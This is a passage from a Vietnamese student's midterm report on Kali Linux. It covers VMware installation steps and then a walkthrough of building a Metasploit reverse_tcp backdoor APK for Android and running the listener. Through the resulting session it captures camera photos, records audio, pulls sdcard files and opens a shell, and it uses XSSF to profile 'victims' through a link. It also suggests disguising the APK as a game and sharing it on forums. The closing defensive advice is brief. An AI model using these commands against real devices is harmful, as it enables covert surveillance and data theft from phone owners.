tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn trong việc xem xét hoặc thay đổi mã

nguồn của các công cụ.

Tính tương thích kiến trúc

Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích với kiến trúc

ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo ra. Giờ đây ta có thể build

Kali trên một Raspberry Pi hoặc trên Samsung Galaxy Note.

Hỗ trợ mạng không dây tốt hơn

Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất, chính là sự hỗ

trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng không dây hay USB Dongles.

Một yêu cầu quan trọng khi các chuyên gia bảo mật thực hiện đánh giá mạng không dây.

Khả năng tùy biến cao

Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống. Đối với giao

diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại Desktops như GNOME, KDE hoặc

XFCE tùy theo sở thích và thói quen sử dụng.

Page 49: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

49

Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai

Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì hệ điều hành

Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố thì chúng ta đều phải cài

lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3).

Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng

hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới

hoàn toàn nữa

4.3. Cài đặt Kali Linux

4.3.1. Chuẩn bị .

File iso Kali Linux: http://www.kali.org/downloads/

Máy có cài sẵn Vmware.

4.3.2. Cài đặt.

Trước tiên cần tải về file ISO phiên bản mới nhất của Kali Linux trên link dưới, bài này ta sẽ tiến

hành cài phiên bản Kali Linux 64 bit. http://www.kali.org/downloads/

Hình 38. Nhấp vào link để down file iso của Kali

Tất nhiên ta cần phải có Vmware, việc tải và cài đặt Vmware rất dễ dàng, ta có thể tìm trên mạng.

Sau khi có file ISO ta bắt đầu tiến hành cài đặt lên máy ảo.

Page 50: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

50

Bắt đầu thiết lập các thông số cho wmware:

Tùy vào cấu hình máy tính các bạn có thể lựa chọn các bản Kali linux khác nhau và thiết

lập cấu hình máy ảo.

Cấu hình máy ảo tối thiểu: 8g ổ cứng và 512 Mb ram.

Một số lưu ý khi sử dụng vmware:

Lỗi chế độ card bright set auto có thể khiến máy ảo không ra được mạng.Nên thiết lập như

hình dưới.

menu->edit->vitualeditor.editor.

Hình 39. Chọn card mạng cho VMnet0

Mở VMware, chọn File ở góc phải trên màn hình, chọn New Virtual Machine... . Trên cửa sổ

mới mở, chọn custom và nhấn next

Page 51: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

51

Hình 40. Chọn phương thức cài đặt

Tiếp tục nhấn next đến khi yêu cầu chọn file ISO thì ta chọn ISO của kali đã tải trước đó:

Hình 41. Chọn phần cứng máy ảo

Page 52: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

52

Hình 42.Chọn cách cài hệ diều hành

Hình 43. Chọn loại Hệ điều hành sẽ cài

Page 53: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

53

Hình 44. Chọn đường dẫn lưu máy ảo

Hình 45. Chọn số nhân sẽ sử dụng trong máy ảo

Page 54: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

54

Hình 46. Chọn lượng ram sẽ sử dụng trong máy ảo

Hình 47. Chọn cách kết nối mạng là Bridged

Page 55: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

55

Hình 48. Chọn loại điều khiển nhập xuất

Hình 49. Chọn loại đĩa sẽ được tạo

Page 56: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

56

Hình 50. Chọn cách thức sử dụng đĩa

Hình 51. Chọn dung lượng tối đa của đĩa

Page 57: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

57

Hinh 52. Tim đường dẫn đến file iso Kali Linux.

B2.Tiến hành cài đặt:

Start máy ảo:

Chọn chế độ install graphic.

Page 58: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

58

Hinh 53. Cài đặt Kali Linux

Hình 54 .Chọn Ngôn Ngữ.

Page 59: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

59

Hình 55. Bắt đầu tiến trình cài

Hinh 56.Đặt tên Hostname

Page 60: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

60

Hinh 57. Đặt tên Domain name

Hinh 58. Đặt password cho user root

Page 61: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

61

Hình 59. Tùy chọn ổ đĩa.

Hình 60. Chọn ổ đĩa cài đặt.

Page 62: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

62

Hinh 61. Phương thức cài đặt ổ đĩa.

Hinh 62. Xác nhận thông số cài đặt

Page 63: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

63

Hinh 63. Xác nhận định dạng ổ đĩa.

Hinh 64. Cài đặt bắt đầu.

Page 64: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

64

Kết thúc quá trình install bạn chọn như hinh dưới:

Hinh 65. Tim kiếm cập nhật qua internet.

Ở đây nếu chọn Yes tiến trình sẽ kiểm tra có hay không bản cập nhật qua mạng. Ta chọn No để

nhanh chóng cài đặt (có thể cập nhật sau khi cài đặt xong).

Hinh 66. Xác nhận cài đặt GRUD.

Page 65: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

65

Tiếp theo tiến trình sẽ hỏi có cài đặt và sử dụng GRUB để khởi động không. Ta chọn Yes

=> Continue.

Hinh 67. Xác nhận cài đặt thành công.

Thông báo xác nhận Kali Linux Đã cài đặt xong. Ta chọn Continue tiến trình sẽ thực hiện xoa

một số file dư thừa sau khi cài đặt rồi khởi động lại.Sau khi hoàn tất phần cuối và khởi động lại,

đến giao diện login ta nhập user là root và password đã đặt ở phần trước.Vậy là ta đã hoàn tất

cài đặt kali linux trên Vmware

Hình 68. Giao diện Kali linux

Page 66: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

66

4.4. Tạo mã độc trên Kali Linux để xâm nhập Android.

Trước khi tiến hành ta nên thiết lập phần Network như sau:

Vào VM => Settings... ở thanh lựa chọn của Vmware

Vào Network Adapter và chọn Bridged: connection directly to the physical network

Page 67: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

67

Vào Edit => Virtual Network Editor...

Trên phần Bridge (connect VMs directly to the external network) chọn adapter của máy

thật

Page 68: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

68

4.4.1. Tạo lập Backdoor

Tiếp theo ta sẽ tiến hành xâm nhập và điều khiển Android bằng Kali Linux. Đầu tiên ta cần

tạo 1 file apk có chứa backdoor bằng cách:

Đầu tiên mở terminal và gõ dòng lệnh ifconfig để biêt thông tin ip của máy.

Sử dụng lệnh msfpayload android/meterpreter/reverse_tcp lhost=192.168.220.128

lport=8080 R > /root/Desktop/App.apk để tạo backdoor. Với 192.168.220.128 là ip đã tìm

được ở trên.

Lệnh trên sẽ tạo ra 1 file app.apk trên desktop của Kali, đây chính là một Metasploit

reverse tcp backdoor.

Page 69: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

69

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ

lệnh sau:

use exploit/multi/handler

set payload /meterpreter/reverse_tcp

set lhost 192.168.220.128 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set port 8080 – nhập port giống với port khi tạo payload ở trên.

exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

Page 70: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

70

Đến đây, vấn đề của chúng ta là làm sao để phân tán file chứa backdoor App.apk đến các

máy Android. Ta có thể ngụy trang file App.apk thành một ứng dụng, game va tiến hành chia sẻ

trên forum. Ở đây thử với một máy Sony Xperia Z giả lập, tải về app.apk, cài đặt và mở lên được

giao diện như dưới, nhấp vào nút reverse_tcp:

Page 71: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

71

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như sau:

Để xem tất cả các lệnh hỗ trợ nhập help

Page 72: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

72

Để xem thông tin về máy, nhập lệnh SysInfo

Xem thông tin card mạng nhập lệnh ipconfig:

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem ở danh sách

camera ở phần trước. Ví dụ như sau:

File hình đã chụp từ camera của máy android là RbWBRryj.jpeg được lưu ở /root của

máy

Page 73: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

73

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về máy

Ta được file ghi âm

Lấy file từ sd card

Để vào sdcard, nhập lệnh : cd /sdcard và lệnh ls để xem danh sách file, thư mục

Page 74: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

74

Ví dụ ở đây, ta tải file App.apk trong thư mục sdcard.dùng lệnh download App.apk

Và file này sẽ được tải về thư mục root của máy Kali

Nhập lệnh shell để điều khiển máy trong chế độ shell. Tai đây ta nhập lệnh ls –l để xem

các file và quyền hạn cần để sử dụng.

Page 75: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

75

Như các bạn cũng thấy thư muc data cần quyền hạn cao nhất để tiến hành sử dụng. Mà các dữ

liệu quan trọng như Contacts, SMS, tài khoản đồng bộ Google… đều được lưu tại đây. Vi thế ta

chỉ có thể lấy cắp các thông tin này nếu như máy Android bị xâm nhập đã được root (hack

chiếm quyền điều khiển cao nhất).

4.4.2. XSSF

Để cài đặt XSSF cho kali sử sụng 3 câu lệnh:

msfupdate

cd /opt/metasploit/apps/pro/msf3

svn export http://xssf.googlecode.com/svn/trunk ./ --force

Page 76: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

76

Xài lệnh trên hình để vào XSSF

Tiếp tục là lệnh

Xssf_urls

Page 77: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

77

Ta thấy XSSF LOG PAGE : http://192.168.220.128:80/xssf/gui.html?guipage=main ,mở trình

duyệt để vào địa chỉ này để vào giao diện XSSF

Page 78: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

78

Địa chỉ gửi cho điện thoại nạn nhân là: http://192.168.220.128:80/xssf/test.html

Kết quả trên terminal khi có diện thoại Android vào link này:

Lệnh xssf_victim dùng để hiện thong tin nạn nhân

Page 79: Bao cao giua ki

GVHD: VÕ ĐỖ THẮNG SVTH: NGUYỄN HOÀNG THẠCH

79

Lệnh xssf_information dùng để hiện thông tin nạn nhân chi tiết hơn

Tiếp tục lệnh search auxiliary/xssf để để xem tất cả các lệnh được hỗ trợ

Page 80: Bao cao giua ki

GVHD:VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH

80

Refesh lại lại trang web sẽ thấy thông tin nạn nhân

Ví dụ: sử dụng lệnh alert để cảnh báo nạn nhân:

Page 81: Bao cao giua ki

GVHD:VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH

81

Gõ run để thực hiện lệnh

Page 82: Bao cao giua ki

GVHD:VÕ ĐỖ THẮNG SVTH:NGUYỄN HOÀNG THẠCH

82

Chương II: Kết luận

Như vậy, ta đã tìm hiểu về Kali Linux, các cải tiến của nó so với BackTrack. Cách sử

dụng Metasploit của Kali Linux để xâm nhập và điều khiển, truyền dữ liệu từ máy Android

về máy.

Sau khi thử nghiệm cách tấn công này, ta rút ra không nên nhấp vào link lạ hay tải về

và chạy file lạ trên máy android để bảo đảm không cài nhầm backdoor như đã thấy ở trên,

không tiến hành root may nếu không thực sự cần thiết vì chỉ cần máy bị nhiễm backdoor là ta

đã có thể xem như có toàn quyền kiểm soát máy Android đó.